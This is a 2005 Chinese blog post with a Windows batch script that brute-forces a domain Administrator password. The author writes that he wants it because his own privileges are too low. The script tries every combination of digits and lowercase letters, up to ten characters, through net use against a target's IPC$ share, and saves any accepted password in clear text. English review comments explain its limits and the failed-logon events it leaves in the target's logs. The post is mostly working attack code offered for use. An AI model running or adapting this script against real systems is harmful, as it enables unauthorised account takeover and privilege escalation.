
用批处理实现局域网口令的破解

作者: phanrider        2005-07-13

最近权限太小,想要破domain\Administrator的口令,所以写了这个小程序


@REM ================================
@REM = Write phanrider =
@REM = 2005.7.13 =
@REM ================================
@rem Takes three positional arguments: target IP, user name, candidate length.
@rem The script writes a temporary batch file of nested loops over a
@rem one-symbol-per-line dictionary and then calls it; the generated file
@rem submits every combination to the IPC$ share of the target via net use.
@rem Files it creates in the working directory: passwd.txt, dict_$.dat, zhl_$.bat.


@rem The next line is a label, not a command; the real setlocal follows echo off.
:setlocal

@rem ==================================================================
@rem Initialisation; the password output file is named passwd.txt
@rem ==================================================================
@echo off
setlocal
rem Candidates accepted by the target are appended to this file in clear text.
set passfile=passwd.txt
rem Temporary dictionary file, one symbol per line.
set dict=dict_$.dat
rem First argument: IP of the target machine.
set ip=%1
rem Second argument: user name on the target machine.
set user=%2
rem Name of the generated batch file that holds the nested loops.
set tempbat=zhl_$.bat
rem Third argument: candidate length, that is the number of nested loops.
set num=%3


:BEGIN
rem Any missing argument sends control to the usage text.
if "%ip%"=="" goto :HELP
if "%num%"=="" goto :HELP
if "%user%"=="" goto :HELP
rem A literal 0 for the IP or the length prints a message and jumps to END.
rem NOTE(review): nothing else about the arguments is validated before they are
rem written into the generated batch file.
if "%ip%"=="0" @echo IP不能为零! && goto :END
if "%num%"=="0" @echo 口令长度不能为零! && goto :END

rem ==================================================================
rem Delete the dictionary and the temporary batch file if they already exist
rem ==================================================================
rem Both files are built with append redirection below, so they must start empty.
rem Output and errors of erase are discarded.
if exist %dict% erase %dict% 1>nul 2>&1
if exist %tempbat% erase %tempbat% 1>nul 2>&1


rem ==================================================================
rem Generate the main program
rem ==================================================================
rem Step 1: append one loop header per character position to the temporary
rem batch file. Position 1 uses loop variable a, position 2 uses b, and so on
rem up to j for position 10. Each header iterates over the lines of the
rem dictionary file. The carets and doubled percent signs are escapes so that
rem the text is written out rather than interpreted by this script.

for /L %%n in (1,1,%num%) do (
if %%n==1 echo for /F ^%%^%%a in (%dict%^) do ( >> %tempbat%
if %%n==2 echo for /F ^%%^%%b in (%dict%^) do ( >> %tempbat%
if %%n==3 echo for /F ^%%^%%c in (%dict%^) do ( >> %tempbat%
if %%n==4 echo for /F ^%%^%%d in (%dict%^) do ( >> %tempbat%
if %%n==5 echo for /F ^%%^%%e in (%dict%^) do ( >> %tempbat%
if %%n==6 echo for /F ^%%^%%f in (%dict%^) do ( >> %tempbat%
if %%n==7 echo for /F ^%%^%%g in (%dict%^) do ( >> %tempbat%
if %%n==8 echo for /F ^%%^%%h in (%dict%^) do ( >> %tempbat%
if %%n==9 echo for /F ^%%^%%i in (%dict%^) do ( >> %tempbat%
if %%n==10 echo for /F ^%%^%%j in (%dict%^) do ( >> %tempbat%
)

rem Step 2: exactly one of the ten lines below matches num and appends the
rem innermost command. That command is a net use to the IPC$ share of the
rem target with the concatenated loop variables as the password, chained to an
rem echo that appends the candidate to the pass file only when net use succeeds.
rem NOTE(review): a length above 10 matches none of these lines, so candidates
rem longer than ten characters are never generated.
if %num%==10 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i%%%%j" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i%%%%j" ^>^> %passfile% >> %tempbat%
if %num%==9 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i" ^>^> %passfile% >> %tempbat%
if %num%==8 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h" ^>^> %passfile% >> %tempbat%
if %num%==7 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g" ^>^> %passfile% >> %tempbat%
if %num%==6 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f" ^>^> %passfile% >> %tempbat%
if %num%==5 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e" ^>^> %passfile% >> %tempbat%
if %num%==4 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d" ^>^> %passfile% >> %tempbat%
if %num%==3 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c" ^>^> %passfile% >> %tempbat%
if %num%==2 echo net use \\%ip%\ipc$ "%%%%a%%%%b" /user:"%user%" ^&^& echo "%%%%a%%%%b" ^>^> %passfile% >> %tempbat%
if %num%==1 echo net use \\%ip%\ipc$ "%%%%a" /user:"%user%" ^&^& echo "%%%%a" ^>^> %passfile% >> %tempbat%


rem Step 3: append one closing parenthesis per loop header written in step 1.
for /L %%n in (1,1,%num%) do echo ^) >> %tempbat%


rem ==================================================================
rem Generate the dictionary
rem ==================================================================
rem One symbol per line: the ten digits, then lowercase a to z, 36 in total.
rem NOTE(review): uppercase letters and punctuation are absent, so a password
rem containing either lies outside the candidate set of this script.
echo 1 >> %dict%
echo 2 >> %dict%
echo 3 >> %dict%
echo 4 >> %dict%
echo 5 >> %dict%
echo 6 >> %dict%
echo 7 >> %dict%
echo 8 >> %dict%
echo 9 >> %dict%
echo 0 >> %dict%
echo a >> %dict%
echo b >> %dict%
echo c >> %dict%
echo d >> %dict%
echo e >> %dict%
echo f >> %dict%
echo g >> %dict%
echo h >> %dict%
echo i >> %dict%
echo j >> %dict%
echo k >> %dict%
echo l >> %dict%
echo m >> %dict%
echo n >> %dict%
echo o >> %dict%
echo p >> %dict%
echo q >> %dict%
echo r >> %dict%
echo s >> %dict%
echo t >> %dict%
echo u >> %dict%
echo v >> %dict%
echo w >> %dict%
echo x >> %dict%
echo y >> %dict%
echo z >> %dict%


rem ==================================================================
rem Start execution
rem ==================================================================
rem Runs the generated batch file; control returns here when it finishes.
rem NOTE(review): every candidate is a separate logon attempt sent to the
rem target, so a run presumably appears there as a dense series of failed
rem logons for one account from one source, recorded as Security event 4625
rem on current Windows when logon auditing is enabled. An account lockout
rem threshold would cut the series short. Confirm against the logging in place.
call %tempbat%




rem ==================================================================
rem Clean up
rem ==================================================================
rem Only the dictionary and the generated batch file are erased. The pass file
rem is not, so any accepted candidate stays on disk in clear text in passwd.txt.
erase %dict% 1>nul 2>&1
erase %tempbat% 1>nul 2>&1


rem Usage text, reached when any of the three arguments is missing.
rem NOTE(review): no goto precedes this label, so a completed run also falls
rem through and prints the usage text before reaching END.
:HELP
echo 可能暴破口令的工具
echo.
echo USE: %0 Ip User Num
echo.
echo Ip 是指目标机器的IP
echo user 是指目标机器上的用户名
echo Num 是指口令长度


rem Common exit point; endlocal discards the variables set after setlocal.
:END

endlocal

